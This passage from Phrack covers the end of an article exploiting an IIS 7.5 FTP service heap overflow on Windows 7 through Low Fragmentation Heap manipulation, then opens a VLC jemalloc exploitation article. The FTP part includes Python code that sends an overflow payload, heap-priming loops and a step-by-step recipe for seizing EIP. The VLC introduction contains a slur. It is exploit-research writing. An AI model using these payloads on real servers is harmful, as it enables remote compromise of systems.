.text:0E07F376 cmp byte ptr [edx], 0FFh
|
|
.text:0E07F379 jnz short loc_E07F37C
|
|
.text:0E07F37B inc edi
|
|
.text:0E07F37C
|
|
.text:0E07F37C loc_E07F37C:
|
|
.text:0E07F37C cmp edx, ebx
|
|
.text:0E07F37E jnz short loc_E07F375 ; count the number
|
|
; of "0xFF" characters
|
|
|
|
The following pseudo code represents the integral pieces of OnSendData:
|
|
|
|
TELNET_STREAM_CONTEXT::OnSendData(DATA_STREAM_BUFFER *dsb)
|
|
{
|
|
char *begin = dsb->BufferBegin;
|
|
char *start = dsb->BufferBegin;
|
|
char *end = dsb->BufferEnd;
|
|
int len = dsb->BufferLength;
|
|
int iac_count = 0;
|
|
|
|
if(begin + len == end)
|
|
return 0;
|
|
|
|
//do a total count of the IAC codes
|
|
do
|
|
{
|
|
start++;
|
|
if(*start == 0xFF)
|
|
iac_count++;
|
|
}
|
|
while(start < end);
|
|
|
|
if(!iac_count)
|
|
return 0;
|
|
|
|
for(char *c = begin; c != end; *begin++ = *c)
|
|
{
|
|
c++;
|
|
if(*c == 0xFF)
|
|
*begin++ == 0xFF;
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
As you can see, if the function encounters a 0xFF that is NOT separated by
|
|
at least 2-bytes then there is a potential to escape the code more than
|
|
once, which will eventually lead to a heap corruption into adjacent memory
|
|
based on the size of the request and amount of IAC codes.
|
|
|
|
For example, if you were to send the string
|
|
"\xFF\xBB\xFF\xFF\xFF\xBB\xFF\xFF" to the server, OnReceivedData produces
|
|
the values:
|
|
|
|
1) Before OnReceivedData
|
|
|
|
a. DSB->BufferLength = 8
|
|
|
|
b. DSB->Buffer = "\xFF\xBB\xFF\xFF\xFF\xBB\xFF\xFF"
|
|
|
|
2) After OnReceivedData
|
|
|
|
a. DSB->BufferLength = 4
|
|
|
|
b. DSB->Buffer = "\xBB\xFF\xBB\xFF"
|
|
|
|
Although OnReceivedData attempted to escape the IAC codes, it didn't expect
|
|
to see multiple 0xFFs within a certain range; therefore writing the
|
|
illegitimate values at an unacceptable range for OnSendData. Using the same
|
|
string from above, OnSendData would write multiple 0xFF characters past the
|
|
end of the buffer due to de-synchronization in the reading and writing into
|
|
the same buffer.
|
|
|
|
Now that it is known that a certain amount of 0xFF characters can be
|
|
written past the end of the buffer, it is time to think about an
|
|
exploitation strategy and gather primitives...
|
|
|
|
|
|
--[ 4 - Exploitation Primitives
|
|
|
|
Exploitation primitives can be thought of as the building blocks of exploit
|
|
development. They can be as simple as program functionality that produces a
|
|
desired result or as complicated as a 1-to-n byte overflow. The section
|
|
will cover many of the primitives used within the exploit.
|
|
|
|
In-depth knowledge of the underlying operating system usually proves to be
|
|
invaluable information when writing exploits. This holds true for the IIS
|
|
FTP exploit, as intricate knowledge of the Windows 7 Low Fragmentation Heap
|
|
served as the basis for exploitation.
|
|
|
|
It was decided that the FreeEntryOffset Overwrite Technique [2] would be
|
|
used due to the limited ability of the attacker to control the contents of
|
|
the overflow. The attack requires the exploiter to enable the low
|
|
fragmentation heap, position a chunk under the exploiter's control before a
|
|
free chunk (implied same size) within the same UserBlock, write at least 10
|
|
bytes past the end of its buffer, and finally make two subsequent requests
|
|
that are serviced from the same UserBlock. [Yes, it's just that easy ;)]
|
|
|
|
The following diagram shows how the FreeEntryOffset is utilized when making
|
|
allocations. The first allocation comes from a virgin UserBlock, setting
|
|
the FreeEntryOffset to the first two-byte value stored in the current free
|
|
chunk. Notice there is no validation when updating the FreeEntryOffset. For
|
|
MUCH more information on the LFH and exploitation techniques please see the
|
|
references section:
|
|
|
|
Allocation 1
|
|
FreeEntryOffset = 0x10
|
|
---------------------------------
|
|
|Header|0x10| Free |
|
|
---------------------------------
|
|
|Header|0x20| Free |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
Allocation 2
|
|
FreeEntryOffset = 0x20
|
|
---------------------------------
|
|
|Header| Used |
|
|
---------------------------------
|
|
|Header|0x20| Free |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
Allocation 3
|
|
FreeEntryOffset = 0x30
|
|
---------------------------------
|
|
|Header| Used |
|
|
---------------------------------
|
|
|Header| Used |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
Now look at the allocation sequence if we have the ability to overwrite a
|
|
FreeEntryOffset with 0xFFFF:
|
|
|
|
Allocation 1
|
|
FreeEntryOffset = 0x10
|
|
---------------------------------
|
|
|Header|0x10| Free |
|
|
---------------------------------
|
|
|Header|0x20| Free |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
Allocation 2
|
|
FreeEntryOffset = 0x20
|
|
---------------------------------
|
|
|Header|FFFFFFFFFFFFFFF |
|
|
---------------------------------
|
|
|Header|FFFF| Free |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
Allocation 3
|
|
FreeEntryOffset = 0xFFFF
|
|
---------------------------------
|
|
|Header| Used |
|
|
---------------------------------
|
|
|Header| Used |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
As you can see, if we can overwrite the FreeEntryOffset with a value of
|
|
0xFFFF then our next allocation will come from unknown heap memory at
|
|
&UserBlock + 8 + (8 * (FreeEntryOffset & 0x7FFF8)) [2]. This may or may
|
|
not point to committed memory for the process, but still provides a good
|
|
starting point for turning a semi-controlled overwrite to a
|
|
fully-controlled overwrite.
|
|
|
|
|
|
--[ 5 - Enabling the LFH
|
|
|
|
If you have read 'Understanding the Low Fragmentation Heap' [2] you'll know
|
|
that it has 'lazy' activation, which means, although it is the default
|
|
front-end allocator, it isn't enabled until a certain threshold is
|
|
exceeded. The most common trigger for enabling the LFH is 16 consecutive
|
|
allocations of the same size.
|
|
|
|
for i in range(0, 17):
|
|
name = "lfh" + str(i)
|
|
payload = gen_payload(0x40, "X")
|
|
lfhpool.alloc(name, payload)
|
|
|
|
You would assume that after making the aforementioned requests
|
|
LFH->HeapBucket[0x40] would be enabled and all further requests for size
|
|
0x40 would be serviced via the LFH; unfortunately this was not the case.
|
|
|
|
This lead to some memory profiling using Immunity Debugger's '!hippie'
|
|
command. After creating and sending many commands and logging heap
|
|
allocations, a pattern of 0x100 byte allocations emerged. This was quite
|
|
peculiar because requests of 0x40 bytes were being sent. Tracing the
|
|
allocations for 0x100 found that the main consumer of the 0x100 byte
|
|
allocations was FTP_SESSION::WriteResponseHelper; our binary audit can
|
|
finally start!
|
|
|
|
Note: If some thought would have been put in before brute forcing sizes it
|
|
would have been noted that this is a C++ application which means that
|
|
request data was most likely kept in some buffer or string class; instead
|
|
of being allocated to a specific request size.
|
|
|
|
Low and behold, looking at the WriteResponseHelper function validated our
|
|
speculation. The function used a buffer class that would allocate 0x100
|
|
bytes and extend itself when necessary:
|
|
|
|
.text:0E074E7A mov eax, [ebp+arg_C] ; dword ptr [eax] == request string
|
|
.text:0E074E7D push edi
|
|
.text:0E074E7E mov edi, [ebp+arg_8]
|
|
.text:0E074E81 mov [ebp+vFtpRequest], eax
|
|
.text:0E074E87 mov esi, 100h
|
|
.text:0E074E8C push esi ; init_size == 0x100
|
|
.text:0E074E8D lea eax, [ebp+var_204]
|
|
.text:0E074E93 mov [ebp+var_27C], ecx
|
|
.text:0E074E99 push eax
|
|
.text:0E074E9A lea ecx, [ebp+var_234]
|
|
.text:0E074EA0 call ds:STRA::STRA(char *,ulong)
|
|
|
|
Next, there is a loop to determine if the normalized request string can fit
|
|
in the STRA object:
|
|
|
|
.text:0E074F59 call ds:STRA::QuerySize(void)
|
|
.text:0E074F5F add eax, eax
|
|
.text:0E074F61 push eax
|
|
.text:0E074F62 lea ecx, [ebp+vSTRA1]
|
|
.text:0E074F68 call ds:STRA::Resize(ulong)
|
|
|
|
Finally, the STRA object will append the user request data to the server
|
|
response code (for example: "500 "):
|
|
|
|
.text:0E0750B4 push [ebp+vFtpRequest]
|
|
.text:0E0750BA call ds:STRA::Append(char const *) ; this is where the
|
|
; resize happens
|
|
.text:0E0750C0 mov esi, eax
|
|
.text:0E0750C2 cmp esi, ebx
|
|
.text:0E0750C4 jl loc_E07515F ; if(!STRA::Apend(vFtpRequest))
|
|
; { destory_objects(); }
|
|
.text:0E0750CA push offset SubStr ; "\r\n"
|
|
.text:0E0750CF lea ecx, [ebp+var_234]
|
|
.text:0E0750D5 call ds:STRA::Append(char const *)
|
|
|
|
Looking into the STRA:Append(char const*) function, a constant value is
|
|
added when there is not enough space to append to the current STRA object:
|
|
|
|
.text:6C9DAAE7 cmp ebx, edx
|
|
.text:6C9DAAE9 ja short loc_6C9DAB3D ; if enough room, copy
|
|
; and update size
|
|
.text:6C9DAAEB jb short loc_6C9DAAF2 ; otherwise add 0x80
|
|
; and resize the BUFFER
|
|
.text:6C9DAAED cmp [edi+24h], esi
|
|
.text:6C9DAAF0 jnb short loc_6C9DAB3D
|
|
.text:6C9DAAF2
|
|
.text:6C9DAAF2 loc_6C9DAAF2:
|
|
.text:6C9DAAF2 xor esi, esi
|
|
.text:6C9DAAF4 cmp [ebp+arg_C], esi
|
|
.text:6C9DAAF7 jz short loc_6C9DAB00
|
|
.text:6C9DAAF9 add eax, 80h ; eax = buffer.size
|
|
|
|
Finally the buffer is resized if necessary and the old data is copied over:
|
|
|
|
.text:6C9DAB1B push eax ; uBytes
|
|
.text:6C9DAB1C mov ecx, edi
|
|
.text:6C9DAB1E call ?Resize@BUFFER@@QAEHI@Z ; BUFFER::Resize(uint)
|
|
.text:6C9DAB23 test eax, eax
|
|
.text:6C9DAB25 jnz short loc_6C9DAB3D
|
|
.text:6C9DAB27 call ds:__imp_GetLastError
|
|
.text:6C9DAB2D cmp eax, esi
|
|
.text:6C9DAB2F jle short loc_6C9DAB64
|
|
.text:6C9DAB31 and eax, 0FFFFh
|
|
.text:6C9DAB36 or eax, 80070000h
|
|
.text:6C9DAB3B jmp short loc_6C9DAB64
|
|
.text:6C9DAB3D
|
|
.text:6C9DAB3D loc_6C9DAB3D:
|
|
.text:6C9DAB3D
|
|
.text:6C9DAB3D mov ebx, [ebp+Size]
|
|
.text:6C9DAB40 mov eax, [edi+20h]
|
|
.text:6C9DAB43 mov esi, [ebp+arg_8]
|
|
.text:6C9DAB46 push ebx ; Size
|
|
.text:6C9DAB47 push [ebp+Src] ; Src
|
|
.text:6C9DAB4A add eax, esi
|
|
.text:6C9DAB4C push eax ; Dst
|
|
.text:6C9DAB4D call memcpy
|
|
|
|
Now that it is known buffers will be sized in multiples of 0x80 (i.e.
|
|
0x100, 0x180, 0x200, etc), the LFH can be activated accordingly (by size).
|
|
The size of 0x180 was chosen because 0x100 is used for most, if not all,
|
|
initial responses, but _any_ valid size could be used.
|
|
|
|
for i in range(0, LFHENABLESIZE):
|
|
name = "lfh" + str(i)
|
|
payload = gen_payload(0x180, "X")
|
|
lfhpool.alloc(name, payload)
|
|
|
|
|
|
--[ 6 - FreeEntryOffset Overwrite
|
|
|
|
It has already been verified that the vulnerability results in an overflow
|
|
of 0xFF characters into an adjacent heap chunk. Therefore the ability to
|
|
enable the LFH for a certain size results in the trivial overwriting of an
|
|
adjacent FreeEntryOffset.
|
|
|
|
For this exploitation technique to work, the LFH must be enabled while
|
|
ensuring that the UserBlock maintains a few free chunks to service requests
|
|
necessary for exploitation.
|
|
|
|
Fortunately, this was quite easy to guarantee while on a single core
|
|
machine:
|
|
|
|
for i in range(0, LFHENABLESIZE):
|
|
name = "lfh" + str(i)
|
|
payload = gen_payload(0x180, "X")
|
|
lfhpool.alloc(name, payload)
|
|
|
|
print "[*] Sending overflow payload"
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((HOST, PORT))
|
|
data = s.recv(1024)
|
|
|
|
buf = "\xff\xbb\xff\xff" * 112 + "\r\n" #ends up allocation 0x180
|
|
#(0x188 after chunk header)
|
|
|
|
print "[*] Sending %d 0xFFs in the whole payload" % countff(buf)
|
|
print "[*] Sending Payload...(%d bytes)" % len(buf)
|
|
analyze(buf)
|
|
s.send(buf)
|
|
s.close()
|
|
|
|
These small portions of code are enough to enable the LFH and overwrite a
|
|
free adjacent chunk after the overflow-able piece of memory. Now when
|
|
subsequent allocations are made for 0x180 bytes, a bad free entry offset
|
|
will be used, providing the application with unexpected memory for
|
|
appending the response.
|
|
|
|
The above describes the following:
|
|
|
|
FreeEntryOffset = 0x1
|
|
0 1 2 3
|
|
[UsedChunk][FreeChunk][OverflowedChunk][FreeChunk]
|
|
.
|
|
.
|
|
.
|
|
[UnknownMemory @ UserBlock + (0xFFFF * 8)]
|
|
|
|
Three subsequent allocations will accomplish the following:
|
|
|
|
1) Allocate FreeChunk at FreeEntryOffset 0x1
|
|
|
|
2) Allocate OverflowedChunk (which is also free) updating
|
|
the FreeEntryOffset to 0xFFFF
|
|
|
|
3) Allocate memory at UserBlock + 0xFFFF (instead of offset 0x3)
|
|
|
|
This means the bad FreeEntryOffset will result in data being completely
|
|
controlled by the attacker.
|
|
|
|
Note: Although quite easily achieved on a single-core machine, heap
|
|
determinism can be much harder on a multi-core platform. Determinism can
|
|
be much more difficult because each core will effectively have its own
|
|
UserBlocks, making chunk placement dependent on which thread services
|
|
a request. While a multi-core machine doesn't make this vulnerability
|
|
completely un-exploitable it does increase the difficulty and decrease
|
|
the reliability.
|
|
|
|
Overwriting the FreeEntryOffset with 0xFFFF has turned a limited heap
|
|
overflow into a write-n, fully controlled overflow; since the heap chunk
|
|
allocated will be 100% populated with user-controlled data. There is only
|
|
one HUGE problem. What should be overwritten? This ended up being the most
|
|
challenging and least reliable portion of the exploit and could still be
|
|
further refined.
|
|
|
|
|
|
--[ 7 - The Impossible
|
|
|
|
In all honesty, the previous few steps were basic vulnerability analysis,
|
|
rudimentary Python and requisite knowledge of Windows 7 heap internals. The
|
|
most difficult and time consuming-portion is explained below.
|
|
|
|
The techniques described below had varying degrees of reliability and might
|
|
not even be the best choice for exploitation. The most valuable knowledge
|
|
to take away will be the process of finding an object to overwrite and
|
|
seeding those objects remotely within the heap.
|
|
|
|
As stated previously, figuring out WHAT to overwrite is quite a problem.
|
|
Not only does a sufficient object, function, or variable, need to be
|
|
unearthed but that item needs to reside in memory where the 'bad'
|
|
allocation points to.
|
|
|
|
A starting point for locating what to overwrite began with the functions'
|
|
list. The function list was chosen because public symbols were available,
|
|
providing descriptive names for the most important functions. Also, since
|
|
the application was written in C++ it was assumed that there would be
|
|
virtual functions that stored function pointers somewhere in memory.
|
|
|
|
The first noticeable item that looked redeeming was FTP_COMMAND class. The
|
|
class will most certainly be instantiated when receiving new commands and
|
|
also contains a vtable.
|
|
|
|
.text:0E073B7D public: __thiscall FTP_COMMAND::FTP_COMMAND(void) proc near
|
|
.text:0E073B7D mov edi, edi
|
|
.text:0E073B7F push ebx
|
|
.text:0E073B80 push esi
|
|
.text:0E073B81 mov esi, ecx
|
|
.text:0E073B83 push edi
|
|
.text:0E073B84 lea ecx, [esi+0Ch]
|
|
.text:0E073B87 mov dword ptr [esi], offset const FTP_COMMAND::`vftable'
|
|
|
|
It also contained a function pointer that had the same name as one in our
|
|
stack trace, albeit in a different class.
|
|
|
|
.text:0E073C8D mov dword ptr [ebx+8],
|
|
offset FTP_COMMAND::AsyncCompletionRoutine(FTP_ASYNC_CONTEXT *)
|
|
|
|
Note: If the stack trace would have been examined more thoroughly, it would
|
|
have been obvious that this wasn't the correct choice, as you will see
|
|
below.
|
|
|
|
At first glance this seemed to be the perfect fit. A breakpoint was set in
|
|
ntdll!RtlpLowFragHeapAllocFromContext() after the initial overflow had
|
|
occurred and appeared to be populated with FTP_COMMAND objects!
|
|
Unfortunately, there didn't seem to be a remote command that could trigger
|
|
a virtual function call within the FTP_COMMAND object at the time of an
|
|
attacker's choosing.
|
|
|
|
Note: Although summed up in one paragraph, this actually took quite some
|
|
time to figure out, as the ability to overwrite a function pointer severely
|
|
clouded judgment.
|
|
|
|
Failure led to flailing around in an attempt to populate heap memory with
|
|
objects that were remotely user-controlled without authentication.
|
|
Eventually, the thought of each FTP_COMMAND having a specific session came
|
|
to mind. The FTP_SESSION class was more closely examined (which was also in
|
|
the stack trace; although this stack trace would eventually change with
|
|
different heap layouts).
|
|
|
|
The real question was 'Can this function be reliably triggered at given
|
|
time X with user input Y?' Some testing took place and indeed, this server
|
|
was truly asynchronous ;). FTP, being a lined based protocol, requires an
|
|
end of line / end of command delimiter. The server will actually wait to
|
|
process the command until it has received the entire line [6].
|
|
|
|
Perhaps a FTP_SESSION object that is associated with a FTP_COMMAND could be
|
|
overwritten, leading to control of a virtual function call. Step tracing
|
|
was used throughout FTP_COMMAND::WriteResponseWithErrorTextAndLog and ended
|
|
up at the FTP_SESSION::Log() function. This function contained multiple
|
|
virtual function calls such as:
|
|
|
|
.text:0E0761C4 mov ecx, [edi+3D8h]
|
|
.text:0E0761CA lea eax, [ebp+var_1B4]
|
|
.text:0E0761D0 push eax ; int
|
|
.text:0E0761D1 push [ebp+dwFlags] ; CodePage
|
|
.text:0E0761D7 mov eax, [ecx]
|
|
.text:0E0761D9 call dword ptr [eax+18h]
|
|
|
|
Now that there is a potential known function pointer in memory to be
|
|
overwritten, how can it be called? Surprisingly it was quite simple. By
|
|
leaving the trailing '\n' off the end of a command, setting up the heap,
|
|
and then sending the end of line delimiter, a call to "call dword ptr
|
|
[eax+18h]" with full control of EAX could be triggered.
|
|
|
|
0:006> r
|
|
eax=43434343 ebx=013f2a60 ecx=0145dc98 edx=0104f900 esi=013dfb98
|
|
edi=013f2a60
|
|
eip=70b661d9 esp=0104f690 ebp=0104f984 iopl=0 nv up ei pl zr na pe nc
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
|
ftpsvc!FTP_SESSION::Log+0x16b:
|
|
70b661d9 ff5018 call dword ptr [eax+18h] ds:0023:4343435b=????????
|
|
|
|
0:006> k
|
|
ChildEBP RetAddr
|
|
0104f984 70b6a997 ftpsvc!FTP_SESSION::Log+0x16b
|
|
0104fa30 70b6ee86
|
|
ftpsvc!FTP_COMMAND::WriteResponseWithErrorTextAndLog+0x188
|
|
0104fa48 70b66051 ftpsvc!FTP_COMMAND::Process+0xd1
|
|
0104fa88 70b676c7 ftpsvc!FTP_SESSION::OnReadCommandCompletion+0x3e2
|
|
0104faf0 70b6772a ftpsvc!FTP_CONTROL_CHANNEL::OnReadCommandCompletion+0x1e4
|
|
0104fafc 70b3f182 ftpsvc!FTP_CONTROL_CHANNEL::AsyncCompletionRoutine+0x17
|
|
0104fb08 70b556e6
|
|
ftpsvc!FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine+0x3c
|
|
|
|
Tracing the function during non-exploitation attempts revealed that the
|
|
function was attempting to get the username (if one existed) for logging
|
|
purposes.
|
|
|
|
1b561d9 ff5018 call dword ptr [eax+18h]
|
|
ds:0023:71b23a38={ftpsvc!USER_SESSION::QueryUserName (71b37823)}
|
|
|
|
Note: Again, this wasn't directly obvious by looking at the function. There
|
|
was quite a bit of static and dynamic analysis to determine the function's
|
|
usefulness.
|
|
|
|
Although the ability to spray the heap with FTP_COMMAND and FTP_SESSION
|
|
objects is possible, it is not as reliable as originally expected. Many
|
|
factors such as number of connections, the low fragmentation heap setup
|
|
(i.e. number of cores on the server) and many others come into play when
|
|
attempting to exploit this vulnerability.
|
|
|
|
For example, the amount of LFH chunks and the number of connections to the
|
|
server ended up having quite an effect on the reliability of the exploit,
|
|
which hovered around 60%. These both contributed to which address the
|
|
misaligned allocation pointed and the contents of the memory.
|
|
|
|
|
|
--[ 8 - Conclusion
|
|
|
|
Although Microsoft and many others claimed that this vulnerability would be
|
|
impossible to exploit for code execution, this paper shows that with the
|
|
correct knowledge and enough determination, impossible turns to difficult.
|
|
|
|
To recap the exploitation process:
|
|
|
|
1) Figure out the vulnerability
|
|
|
|
2) Familiarize oneself with how heap memory is managed
|
|
|
|
3) Obtain in-depth knowledge of the operating system's memory managers
|
|
|
|
4) Prime the LFH to a semi-deterministic state
|
|
|
|
5) Send a request to overflow an adjacent chunk on the LFH
|
|
|
|
6) Create numerous connections in an attempt to populate the heap with
|
|
FTP_SESSION objects; which will create USER_SESSION objects as well
|
|
|
|
7) Send an unfinished request on the previously created connections
|
|
|
|
8) Make 3 allocations from the LFH for same size as your overflowable
|
|
chunk
|
|
|
|
a. 1st == Allocate and overflow into next chunk
|
|
|
|
b. 2nd == FreeEntryOffset will be set to 0xFFFF
|
|
|
|
c. 3rd == Allocation will (hopefully) point to memory which points
|
|
to a FTP_SESSION object containing a USER_SESSION class;
|
|
completely overwriting the function pointer in memory
|
|
|
|
9) Finish the command from the connection pool by sending a trailing
|
|
'\n', which in turn calls the OverlappedCompletionRoutine(),
|
|
therefore calling the FTP_SESSION::Log() function in the process
|
|
|
|
10) This will obtain EIP with multiple registers pointing to
|
|
user-controlled data. From there ASLR and DEP will need to be
|
|
subverted to gain code execution. Take a look at
|
|
DATA_STREAM_BUFFER.Size, which will determine how many bytes are
|
|
sent back to a user in a response
|
|
|
|
Although full arbitrary code execution wasn't achieved in the exploit, it
|
|
still proves that a remote attacker can potentially gain control over EIP
|
|
via a remote unauthenticated FTP connection that can be used to subvert the
|
|
security posture of the entire system, instead of limiting the scope to a
|
|
denial of service.
|
|
|
|
The era of simple exploitation is behind us and more exploitation
|
|
primitives must be used when developing modern exploits. By having a strong
|
|
foundation of operating system knowledge and exploitation techniques, you,
|
|
too, can turn impossible bugs into exploitable ones.
|
|
|
|
|
|
--[ 9 - References
|
|
|
|
[1] - Preventing the exploitation of user mode heap corruption
|
|
vulnerabilities
|
|
(http://blogs.technet.com/b/srd/archive/2009/08/04/preventing-the-
|
|
exploitation-of-user-mode-heap-corruption-vulnerabilities.aspx)
|
|
|
|
[2] - Understanding the Low Fragmentation Heap
|
|
(http://illmatics.com/Understanding_the_LFH.pdf)
|
|
|
|
[3] - Windows 7 IIS 7.5 FTPSVC Denial Of Service
|
|
(http://packetstormsecurity.org/files/96943/
|
|
Windows-7-IIS-7.5-FTPSVC-Denial-Of-Service.html)
|
|
|
|
[4] - Assessing an IIS FTP 7.5 Unauthenticated Denial of Service
|
|
Vulnerability
|
|
(http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-
|
|
ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx)
|
|
|
|
[5] - The Telnet Protocol
|
|
(http://support.microsoft.com/kb/231866)
|
|
|
|
[6] - Synchronization and Overlapped Input and Output
|
|
(http://msdn.microsoft.com/en-us/library/windows/desktop/
|
|
ms686358(v=vs.85).aspx)
|
|
|
|
--[ 10 - Exploit (thing.py)
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0d of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------=[ The Art of Exploitation ]=-----------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ Exploiting VLC ]=---------------------------|
|
|
|=------------=[ A case study on jemalloc heap overflows ]=--------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ huku | argp ]=------------------------=|
|
|
|=--------------------=[ {huku,argp}@grhack.net ]=---------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
--[ Table of contents
|
|
|
|
1 - Introduction
|
|
1.1 - Assumptions
|
|
2 - Notes on jemalloc magazines
|
|
2.1 - Your heap reversed
|
|
2.2 - Your reversed heap reversed again
|
|
2.3 - Sum up of jemalloc magazine facts
|
|
3 - 'MP4_ReadBox_skcr()' heap overflow vulnerability
|
|
3.1 - MP4 file format structure
|
|
3.2 - Vulnerability details
|
|
3.3 - Old is gold; 'unlink()' style ftw
|
|
3.4 - Controlling 'p_root' data
|
|
3.5 - MP4 exploitation sum up
|
|
4 - Real Media 'DemuxAudioSipr()' heap overflow vulnerability
|
|
4.1 - VLC as a transcoder
|
|
4.2 - RMF? What's that?
|
|
4.3 - Vulnerability details
|
|
4.4 - 'p_blocks' all over the place
|
|
4.5 - RMF summary
|
|
5 - Building a reliable exploit
|
|
5.1 - Overall process
|
|
5.2 - Detecting 'p_root' address candidates
|
|
6 - Demonstration
|
|
7 - Limitations
|
|
8 - Final words
|
|
9 - References
|
|
10 - T3h l337 c0d3z
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
The idiom 'exploitation is an art' has been written in Phrack so many
|
|
times that it has probably ended up sounding cliche. With the emergence
|
|
of ASLR, NX, stack cookies, 'unlink()' protections and so on, exploit
|
|
writers seem to have realized the value of their code and have stopped
|
|
sharing their work with ugly faggots (you know who you are). Just have
|
|
a look at the various mailing lists and exploit archives; even the tons
|
|
of Linux kernel exploits found there are almost trash. Obviously it's not
|
|
the exploit writers that have lost their abilities; it's probably because
|
|
they don't care to share fully weaponized code (that's only a privilege of
|
|
people who pay for [censored] or [censored] lulz). The fact that working
|
|
exploits have stopped being released doesn't necessarily mean that the
|
|
underground has stopped their development. Although there's no way for
|
|
us to know, we believe we would all be amazed if we were to have even a
|
|
glimpse of what the underground has to offer (watch and learn: [1], [2]).
|
|
|
|
In order to develop the exploit presented in this article, we spent about
|
|
a month of continuous late nights in front of ugly terminals, eating junk
|
|
and taking breaks only to piss and shit (funny times). We managed to
|
|
develop a reliable local exploit for VLC. By 'almost' we mean that it is
|
|
possible to make our code 100% reliable but some work is still required;
|
|
we wish we had more time but Phrack had to be released. More details
|
|
on how to extend our code and bypass the limitations that confine its
|
|
reliability are given at a later section. It would probably be a fun
|
|
pastime for someone to continue from where we left off; it's not that
|
|
hard after all the bullshit we had to face. We hope to show you why
|
|
developing an exploit nowadays requires hard work, dedication and at
|
|
least one memleak ;)
|
|
|
|
This phile was at first meant to be part of our jemalloc research also
|
|
presented in this Phrack issue. Nevertheless, the Phrack staff honored us
|
|
by asking if we were willing to write a separate text with an in-depth
|
|
analysis of all that voodoo we had to perform. Readers might agree that
|
|
VLC is not the most exotic target one can come up with, but we decided
|
|
not to disclose any 0day vulnerabilities and keep it going with a list
|
|
of already published material, found by carefully looking for advisories
|
|
tagged as 'heap based overflows' (we could have googled for 'potential
|
|
DoS' as well, since it usually means ring0 access ;). Keep in mind that
|
|
we wouldn't like to present a vulnerability that would be trivial to
|
|
exploit. We were looking for a target application with a large codebase;
|
|
VLC and Firefox were our primary candidates. We finally decided to deal
|
|
with the first. The result was a local exploit that does not require
|
|
the user to give any addresses; it can figure out everything by itself.
|
|
|
|
|
|
----[ 1.1 - Assumptions
|
|
|
|
For the shake of writing this article...
|
|
|
|
1 - We assume that the attacker has local access on a server running VLC.
|
|
The VLC instance must have at least one of its several control interfaces
|
|
enabled (HTTP via --extraintf, RC via --rc-host or --rc-unix), that
|
|
will be used to issue media playback requests to the target and make
|
|
the whole process interactive, that is VLC should be running in 'daemon'
|
|
mode. Most people will probably think that those control interfaces can
|
|
also be used to perform a remote attack; they are right. Although, the
|
|
MP4 vulnerability exploited in this article cannot be used for remote
|
|
exploitation, developing a reliable remote exploit is, indeed, feasible
|
|
and in fact, it's just a matter of modifying the attached code.
|
|
|
|
Note: Remote exploitation using MP4 files can be performed by streaming
|
|
MP4 data to the VLC server. Unfortunately, MP4 streams are handled by
|
|
libffmpeg while MP4 files by VLC's custom MP4 demuxer. Don't get us
|
|
wrong, we don't believe that ffmpeg is bug-free; it might be vulnerable
|
|
to the exact same flaw, we just didn't have the time to investigate
|
|
it further.
|
|
|
|
2 - VLC cannot be run as root, so, don't expect uid 0 shells. We will
|
|
only try to stress the fact that some people will go to great lengths
|
|
to have your ass in their plate. Hacking is all about information,
|
|
the more information the easier for you to elevate to root.
|
|
|
|
3 - We assume our target is a x86 machine running FreeBSD-8.2-RELEASE,
|
|
the exact same version we used during our main jemalloc research.
|
|
|
|
4 - Last but not least, we assume you have read and understood our
|
|
jemalloc analysis. We don't expect you to be a jemalloc ninja, but
|
|
studying our work the way you do your morning newspaper will not get
|
|
you anywhere either ;)
|
|
|
|
|
|
--[ 2 - Notes on jemalloc magazines
|
|
|
|
----[ 2.1 - Your heap reversed
|
|
|
|
In our main jemalloc research we discussed the use of 'magazines' as a
|
|
thread contention avoidance mechanism. Briefly, when a process spawns
|
|
multiple threads, a global variable called '__isthreaded' is set to
|
|
true. This variable, which can be accessed via the 'extern' storage
|
|
class specifier by any application, instructs jemalloc to initialize
|
|
thread-local data structures for caching heap allocations. Those
|
|
data structures, the so called 'magazines', are allocated and populated
|
|
in a lazy fashion. In the case of 'malloc()', a threaded application
|
|
will eventually reach the 'if' clause shown below ('MALLOC_MAG' and
|
|
'opt_mag' are enabled by default).
|
|
|
|
|
|
#ifdef MALLOC_MAG
|
|
static __thread mag_rack_t *mag_rack;
|
|
#endif
|
|
|
|
...
|
|
|
|
static inline void *
|
|
arena_malloc(arena_t *arena, size_t size, bool zero)
|
|
{
|
|
...
|
|
|
|
if(size <= bin_maxclass) {
|
|
#ifdef MALLOC_MAG
|
|
if(__isthreaded && opt_mag) {
|
|
mag_rack_t *rack = mag_rack;
|
|
if(rack == NULL) {
|
|
rack = mag_rack_create(arena);
|
|
if(rack == NULL)
|
|
return (NULL);
|
|
mag_rack = rack;
|
|
}
|
|
return(mag_rack_alloc(rack, size, zero));
|
|
}
|
|
...
|
|
#endif
|
|
|
|
...
|
|
}
|
|
|
|
|
|
The first point of interest is the '__thread' classifier in the
|
|
declaration of 'mag_rack'. This specifier instructs gcc/binutils to
|
|
make use of the, so called, TLS (Thread Local Storage) mechanism. The
|
|
'__thread' declarations are grouped and then act as a prototype for
|
|
the initialization of each thread. Simply put, each thread spawned via
|
|
'pthread_create()' will inherit its own private copy of 'mag_rack'
|
|
